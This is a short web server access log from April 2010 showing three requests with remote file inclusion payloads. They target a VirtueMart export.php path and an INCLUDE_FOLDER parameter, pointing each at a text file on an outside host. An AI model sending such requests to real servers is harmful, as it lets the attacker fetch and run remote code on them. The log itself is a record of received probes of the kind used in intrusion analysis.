58.230.162.220 - - [07/Apr/2010:07:03:29 -0400] "GET /logs/access_log.Q110031200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:03:34 -0400] "GET /?INCLUDE_FOLDER=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:03:34 -0400] "GET /logs/?INCLUDE_FOLDER=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 45236 "-" "Mozilla/5.0"
